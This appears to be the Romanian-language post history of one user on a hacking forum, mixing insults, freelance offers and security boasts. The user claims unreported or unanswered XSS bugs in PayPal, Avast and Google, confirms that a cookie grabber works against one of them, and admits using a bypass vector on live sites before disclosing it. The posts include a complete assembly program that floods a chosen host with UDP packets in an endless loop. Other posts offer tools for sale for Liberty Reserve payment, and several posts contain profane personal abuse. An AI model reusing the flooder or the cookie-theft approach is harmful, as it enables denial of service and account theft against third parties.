RUTE

@bt.ionut Ce OK ma? Nu ai alta treaba si postezi asa, degeaba?

Buna ziua, vin si eu cu o propunere de colaborare catre membrii acestui forum. Am cunostintele necesare in a coda o pagina web de la 0, insa nu sunt foarte bun la web design, prin urmare caut mai multe persoane care au pagini web in format PSD pentru a le coda in HTML. In urma acestui proiect, le voi vinde pe contul meu de pe ThemeForest si profiturile vor fi impartite 50/50. Cerintele mele sunt: Doar pagini professional-looking, demne de marketplaceul Envato Seriozitate Cine este interesat, astept un mesaj privat cu datele de contact. Multumesc!

@Toshib4 Problema e ca el nu munceste, ci doar se prosteste in fata unui webcam, punand 2 videouri la intamplare si gata.

Esti prost. Si rarait. La varsta ta ar trebui sa te joci pe afara, nu sa iti faci vloguri. Posibilitati de monetizare, haha. Cine dracu ar da doi bani pe reclama la un canal cu 1k vizualizari, 90% de la copii la fel de batuti in cap. Ba, nu am nimic cu el, dar de abea daca intelegi ce vorbeste acolo, si are si niste faze de copil cazut in cap. Voi spuneti ca vai, vezi ca el macar poate face ceva bani la varsta lui, pai la varsta lui ar putea face la fel bani, dar nu din vloguri si cacaturi (noua moda la noi din cate vad) ci prin a invata ceva programare si a isi vinde serviciile. Atat am avut de zis.

@wasdwasd223 De ce pula mea ti-e frica sa comentezi cu contul real? Sau asa faimos sunt ca ti-ai facut cont special pentru mine? :>

@mah_one Felicitari. @restu Sa-mi bag pula de mai fac vreun show-off, cum gaseste unu ceva, hop hienele la pandit, poate poate mai fac 2-3 likeuri cu teoria conspiratiei. @MOD's Va rog inchideti topicul.

@yoyois Ma crezi idiot? Crezi ca am sa il folosesc pe orice balarie de site romanesc, care posibil sa aiba in forms XSS Keylogger, sa il pierd? Nope, pana nu e patchuit nu il folosesc decat unde stiu sigur ca nu il pot pierde foarte repede si ma aleg cu ceva daca il pierd. Oricum, dupa ce nu va mai functiona in parametrii normali, voi face disclosure.

@Kay97 Nu vreau sa ma apuc de furat conturi de PP si etc, plus ca au si program de Bug Bounty.

@laz Adu-mi si tu dovezile ca ai buguri in PayPal. Incep sa apara haterii, normal, nu conteaza, chiar nu imi pasa. Nu lucrez pentru "faima", lucrez pentru mine, parerea ta e nula pentru mine. Nu e neaparat vectorul care face bypass, poate m-am exprimat gresit, e obfuscarea prin care l-am adus unde e, vectorul e clasicul script alert.

@wildchild Much bored .

@laz Daca rasfoiai prin topicuri, iti dadeai seama ca am un vector 0,5day care face bypass cam la toate metodele de protectie impotriva XSS. Daca tu cauti cu bine-cunoscutul "<script>alert(/xss/)</script>", atunci nu ma mir ca ti-a luat peste 100 de ore. Daca stii cum si unde sa cauti, chiar si cu acesti vectori basic, tot gasesti mai repede. Succes!

@Domnul.Do Deja imi pare rau ca am raportat .

Titlu: PAYPAL.com - XSS (Cross-Site-Scripting) Data: 2013-04-11 Categorie: Remote Exploit Status: Raportat - Functionabil - Fara raspuns Risk: HIGH Platforma: PHP Autor: RUTE --------------------------------------------- Info: Gata pe azi, deja e prea mult.

@akkiliON Eh, lasa, ca oricum de cand am Avast nu am avut probleme cu virusii. E un fel de rasplata, sa zic .

Mersi akkiliON !

Titlu: AVAST.com - XSS (Cross-Side-Scripting) Data: 2013-04-11 Categorie: Remote Exploit Status: Raportat - Functionabil - Fara raspuns Risk: HIGH Platforma: PHP Autor: RUTE --------------------------------------------- Info: Ca tot a pomenit akkilliON ca si astia au Bug Bounty, am zis sa incerc si eu .

@akkiliON Da, merge Cookie Grabber. Si da, in accounts e .

@Domnul.Do Multumesc pentru informatiile din topic, am sa completez acel formular si il voi trimite daca mi-l vor cere. M-am uitat pe : Program Rules – Application Security – Google, si vad ca o sa fie de fapt $3,133.7 .

Titlu: *.GOOGLE.com - XSS (Cross-Site-Scripting) Data: 2013-04-11 Categorie: Remote Exploit Status: Raportat - Functionabil - Fara raspuns Risk: HIGH Platforma: PHP Autor: RUTE --------------------------------------------- Info:Metoda folosita este 0-day, descoperita de mine ieri, functioneaza pe orice browser prin GET, POST nu.

Gata: https://rstforums.com/chat/ .

@hate.me Multumesc mult de indrumare, am sa caut de aici pe Google cum se foloseste.

Eu nu am mai lucrat cu astfel de exploituri, unde ar trebui sa inserez acel cod? Am incercat intr-o pagina HTML, insa fara folos.

format PE console 4.0 entry start include 'include\win32a.inc' section '.data' data readable writeable ; Time between each packets iSleep equ 500d ; Destination Port sPort equ 2750d ; Destination Host sHost db 'remotehost',0 ; Packet to Send sPacket db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',0 sPacketl = $ - sPacket sock dd ? sin_addr dd ? sin_port dd ? saddr sockaddr_in wsadata WSADATA section '.code' code readable executable start: invoke WSAStartup, 0202h, wsadata ; Declare our UDP Socket invoke socket, AF_INET, SOCK_DGRAM, 17 ;IPPROTO_UDP = 17 mov [sock], eax mov [saddr.sin_family], AF_INET ; Select Port invoke htons, sPort mov [saddr.sin_port], ax ; Select IP invoke gethostbyname, sHost mov eax, [eax+12] mov eax, [eax] mov eax, [eax] mov [saddr.sin_addr], eax ; Start our infinite loop .loop: invoke sendto, [sock], sPacket, sPacketl, 0, saddr,sizeof.sockaddr_in cmp eax, 0 je exit invoke Sleep, iSleep jmp .loop ; useless part exit: invoke closesocket, [sock] invoke WSACleanup invoke ExitProcess,0 section '.idata' import data readable writeable library kernel,'KERNEL32.DLL',\ winsock,'WSOCK32.DLL' import kernel,\ ExitProcess,'ExitProcess',\ Sleep,'Sleep' import winsock,\ WSAStartup,'WSAStartup',\ WSACleanup,'WSACleanup',\ socket,'socket',\ sendto,'sendto',\ inet_addr,'inet_addr',\ htons,'htons',\ closesocket,'closesocket',\ gethostbyname,'gethostbyname'

Salut, iti dau eu pe EXIGO daca mai ai nevoie, plata doar prin Liberty Reserve o accept. Dau orice fel de dovezi inainte daca e nevoie.

Daca esti dispus sa platesti, iti pot crea eu unul. Lasa-mi un mesaj cu o metoda prin care te-as putea contacta.